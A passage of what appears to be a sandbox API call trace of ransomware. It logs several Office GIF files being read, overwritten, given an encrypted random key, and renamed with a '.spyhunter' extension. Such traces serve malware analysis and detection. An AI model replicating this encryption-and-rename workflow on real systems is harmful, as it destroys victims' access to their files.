Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21304_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.041] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF") returned 73 [0101.041] StrStrW (lpFirst="BD21304_.GIF", lpSrch=".txt") returned 0x0 [0101.041] GetProcessHeap () returned 0x2c0000 [0101.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.041] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbf4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbf4*=0x24f, lpOverlapped=0x0) returned 1 [0101.042] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffdb1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.042] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x24f, lpNumberOfBytesWritten=0x248fbf4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbf4*=0x24f, lpOverlapped=0x0) returned 1 [0101.042] GetProcessHeap () returned 0x2c0000 [0101.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.042] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.043] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbf4, lpOverlapped=0x0 | out: lpBuffer=0x248fc34*, lpNumberOfBytesWritten=0x248fbf4*=0x4, lpOverlapped=0x0) returned 1 [0101.043] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbf4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbf4*=0x30, lpOverlapped=0x0) returned 1 [0101.043] CloseHandle (hObject=0xb4) returned 1 [0101.043] GetProcessHeap () returned 0x2c0000 [0101.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0101.043] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF.spyhunter") returned 83 [0101.043] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21304_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21304_.gif.spyhunter")) returned 1 [0101.320] GetProcessHeap () returned 0x2c0000 [0101.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0101.320] GetProcessHeap () returned 0x2c0000 [0101.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.320] GetProcessHeap () returned 0x2c0000 [0101.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x339f20 | out: hHeap=0x2c0000) returned 1 [0101.320] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc30 | out: pbBuffer=0x248fc30) returned 1 [0101.320] GetProcessHeap () returned 0x2c0000 [0101.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.320] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc28*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc28*=0x30) returned 1 [0101.321] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115864.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.321] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF") returned 73 [0101.321] StrStrW (lpFirst="J0115864.GIF", lpSrch=".txt") returned 0x0 [0101.321] GetProcessHeap () returned 0x2c0000 [0101.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.321] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbec*=0xb9, lpOverlapped=0x0) returned 1 [0101.322] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.322] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x248fbec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbec*=0xb9, lpOverlapped=0x0) returned 1 [0101.322] GetProcessHeap () returned 0x2c0000 [0101.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.323] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.323] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbec, lpOverlapped=0x0 | out: lpBuffer=0x248fc2c*, lpNumberOfBytesWritten=0x248fbec*=0x4, lpOverlapped=0x0) returned 1 [0101.323] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbec*=0x30, lpOverlapped=0x0) returned 1 [0101.323] CloseHandle (hObject=0xb4) returned 1 [0101.323] GetProcessHeap () returned 0x2c0000 [0101.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0101.323] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF.spyhunter") returned 83 [0101.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115864.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115864.gif.spyhunter")) returned 1 [0101.324] GetProcessHeap () returned 0x2c0000 [0101.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.324] GetProcessHeap () returned 0x2c0000 [0101.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.325] GetProcessHeap () returned 0x2c0000 [0101.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf71c0 | out: hHeap=0x2c0000) returned 1 [0101.325] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc30 | out: pbBuffer=0x248fc30) returned 1 [0101.325] GetProcessHeap () returned 0x2c0000 [0101.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.325] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc28*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc28*=0x30) returned 1 [0101.325] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115863.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.327] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF") returned 73 [0101.327] StrStrW (lpFirst="J0115863.GIF", lpSrch=".txt") returned 0x0 [0101.327] GetProcessHeap () returned 0x2c0000 [0101.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.327] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbec*=0xed, lpOverlapped=0x0) returned 1 [0101.652] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.653] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x248fbec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbec*=0xed, lpOverlapped=0x0) returned 1 [0101.653] GetProcessHeap () returned 0x2c0000 [0101.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.653] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.653] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbec, lpOverlapped=0x0 | out: lpBuffer=0x248fc2c*, lpNumberOfBytesWritten=0x248fbec*=0x4, lpOverlapped=0x0) returned 1 [0101.653] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbec*=0x30, lpOverlapped=0x0) returned 1 [0101.653] CloseHandle (hObject=0xb4) returned 1 [0101.653] GetProcessHeap () returned 0x2c0000 [0101.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0101.653] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF.spyhunter") returned 83 [0101.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115863.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115863.gif.spyhunter")) returned 1 [0101.654] GetProcessHeap () returned 0x2c0000 [0101.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.654] GetProcessHeap () returned 0x2c0000 [0101.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.654] GetProcessHeap () returned 0x2c0000 [0101.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf70e0 | out: hHeap=0x2c0000) returned 1 [0101.654] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc28 | out: pbBuffer=0x248fc28) returned 1 [0101.655] GetProcessHeap () returned 0x2c0000 [0101.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.655] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc20*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc20*=0x30) returned 1 [0101.655] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115844.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.656] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF") returned 73 [0101.656] StrStrW (lpFirst="J0115844.GIF", lpSrch=".txt") returned 0x0 [0101.656] GetProcessHeap () returned 0x2c0000 [0101.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.656] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbe4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbe4*=0xb0, lpOverlapped=0x0) returned 1 [0101.657] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.657] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x248fbe4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbe4*=0xb0, lpOverlapped=0x0) returned 1 [0101.657] GetProcessHeap () returned 0x2c0000 [0101.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.657] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.657] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbe4, lpOverlapped=0x0 | out: lpBuffer=0x248fc24*, lpNumberOfBytesWritten=0x248fbe4*=0x4, lpOverlapped=0x0) returned 1 [0101.657] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbe4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbe4*=0x30, lpOverlapped=0x0) returned 1 [0101.657] CloseHandle (hObject=0xb4) returned 1 [0101.657] GetProcessHeap () returned 0x2c0000 [0101.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0101.658] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF.spyhunter") returned 83 [0101.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115844.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115844.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115844.gif.spyhunter")) returned 1 [0101.658] GetProcessHeap () returned 0x2c0000 [0101.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.658] GetProcessHeap () returned 0x2c0000 [0101.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.658] GetProcessHeap () returned 0x2c0000 [0101.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf7000 | out: hHeap=0x2c0000) returned 1 [0101.658] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc28 | out: pbBuffer=0x248fc28) returned 1 [0101.658] GetProcessHeap () returned 0x2c0000 [0101.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.659] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc20*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc20*=0x30) returned 1 [0101.659] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115843.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.659] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF") returned 73 [0101.659] StrStrW (lpFirst="J0115843.GIF", lpSrch=".txt") returned 0x0 [0101.659] GetProcessHeap () returned 0x2c0000 [0101.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.659] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbe4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbe4*=0xb0, lpOverlapped=0x0) returned 1 [0101.660] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.660] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x248fbe4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbe4*=0xb0, lpOverlapped=0x0) returned 1 [0101.660] GetProcessHeap () returned 0x2c0000 [0101.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.660] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.660] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbe4, lpOverlapped=0x0 | out: lpBuffer=0x248fc24*, lpNumberOfBytesWritten=0x248fbe4*=0x4, lpOverlapped=0x0) returned 1 [0101.661] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbe4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbe4*=0x30, lpOverlapped=0x0) returned 1 [0101.661] CloseHandle (hObject=0xb4) returned 1 [0101.661] GetProcessHeap () returned 0x2c0000 [0101.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0101.661] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF.spyhunter") returned 83 [0101.661] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115843.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115843.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115843.gif.spyhunter")) returned 1 [0101.661] GetProcessHeap () returned 0x2c0000 [0101.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.661] GetProcessHeap () returned 0x2c0000 [0101.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.662] GetProcessHeap () returned 0x2c0000 [0101.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf6f20 | out: hHeap=0x2c0000) returned 1 [0101.662] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc20 | out: pbBuffer=0x248fc20) returned 1 [0101.662] GetProcessHeap () returned 0x2c0000 [0101.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.662] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc18*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc18*=0x30) returned 1 [0101.662] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115842.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.662] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF") returned 73 [0101.662] StrStrW (lpFirst="J0115842.GIF", lpSrch=".txt") returned 0x0 [0101.662] GetProcessHeap () returned 0x2c0000 [0101.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.662] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbdc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbdc*=0xb0, lpOverlapped=0x0) returned 1 [0101.663] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.663] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x248fbdc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbdc*=0xb0, lpOverlapped=0x0) returned 1 [0101.664] GetProcessHeap () returned 0x2c0000 [0101.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.664] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.664] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbdc, lpOverlapped=0x0 | out: lpBuffer=0x248fc1c*, lpNumberOfBytesWritten=0x248fbdc*=0x4, lpOverlapped=0x0) returned 1 [0101.664] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbdc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbdc*=0x30, lpOverlapped=0x0) returned 1 [0101.664] CloseHandle (hObject=0xb4) returned 1 [0101.664] GetProcessHeap () returned 0x2c0000 [0101.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0101.664] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF.spyhunter") returned 83 [0101.664] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115842.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115842.gif.spyhunter")) returned 1 [0101.665] GetProcessHeap () returned 0x2c0000 [0101.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.665] GetProcessHeap () returned 0x2c0000 [0101.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.665] GetProcessHeap () returned 0x2c0000 [0101.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf6e40 | out: hHeap=0x2c0000) returned 1 [0101.665] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc20 | out: pbBuffer=0x248fc20) returned 1 [0101.665] GetProcessHeap () returned 0x2c0000 [0101.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.665] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc18*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc18*=0x30) returned 1 [0101.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115841.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.666] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF") returned 73 [0101.666] StrStrW (lpFirst="J0115841.GIF", lpSrch=".txt") returned 0x0 [0101.666] GetProcessHeap () returned 0x2c0000 [0101.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.666] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbdc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbdc*=0xb1, lpOverlapped=0x0) returned 1 [0101.667] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.667] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x248fbdc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbdc*=0xb1, lpOverlapped=0x0) returned 1 [0101.667] GetProcessHeap () returned 0x2c0000 [0101.667] 